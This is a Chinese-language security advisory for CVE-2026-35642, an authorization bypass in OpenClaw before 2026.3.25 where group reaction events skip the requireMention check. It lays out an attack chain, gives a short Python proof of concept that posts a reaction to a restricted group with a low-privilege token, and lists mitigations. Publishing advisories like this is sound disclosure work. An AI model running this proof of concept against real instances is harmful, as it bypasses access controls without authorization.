IPBUF安全漏洞报告
English
CVE-2026-35642 CVSS 4.3 中危

CVE-2026-35642 OpenClaw授权绕过漏洞

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2026-35642
漏洞类型
授权绕过
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

Authorization BypassAccess ControlOpenClawCVE-2026-35642

漏洞概述

OpenClaw 在 2026.3.25 之前的版本中存在一处授权绕过漏洞。该漏洞源于群组反应事件未能正确执行 `requireMention` 访问控制机制。攻击者可利用此缺陷,在应受限制的群组中触发反应事件,导致本应受限的、代理可见的系统事件被加入处理队列,绕过了安全限制。

技术细节

该漏洞的核心在于 OpenClaw 处理“群组反应事件”时未正确应用 `requireMention` 访问控制策略。在正常逻辑下,当群组配置了 `requireMention` 标志时,系统应仅允许特定上下文(如显式提及)下的操作触发代理可见的系统事件。然而,受影响版本在处理反应事件时,绕过了这一权限校验层。攻击者仅需具备低权限用户身份,即可向设置了访问限制的群组发送反应请求。由于校验逻辑的缺陷,服务器接受该请求并生成相应的系统事件,将其排队等待代理处理。这一过程导致原本应被拦截的操作绕过了安全边界,违反了最小权限原则,造成了系统完整性的低程度损害。

攻击链分析

STEP 1
1. 侦察
攻击者识别出目标使用的是 OpenClaw 系统,并发现存在设置了 requireMention 限制的群组。
STEP 2
2. 获取低权限账号
攻击者注册或获取一个普通低权限用户账号(PR:L)。
STEP 3
3. 发送恶意请求
攻击者向受限群组发送群组反应事件请求(如表情符号反应)。
STEP 4
4. 绕过校验
系统未正确校验 requireMention 标志,直接接受了该请求。
STEP 5
5. 触发系统事件
系统将本应受限的代理可见事件加入队列,完成了对访问控制的绕过。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "https://openclaw-instance.com/api/v1/groups/{group_id}/reactions" group_id = "target_restricted_group_id" attacker_token = "low_privilege_user_token" # Payload to trigger a reaction payload = { "emoji": "thumbs_up", "user_id": "attacker_id" } headers = { "Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json" } # Send the reaction request to bypass requireMention try: response = requests.post(target_url.format(group_id=group_id), json=payload, headers=headers) if response.status_code == 200 or response.status_code == 201: print("[+] PoC successful: Reaction triggered in restricted group.") print(f"[+] Response: {response.text}") else: print(f"[-] PoC failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施
建议管理员立即审查 OpenClaw 实例的访问日志,查找是否存在异常的反应事件。在升级补丁前,可暂时禁用群组反应功能或通过网络策略限制对 API 端点的访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表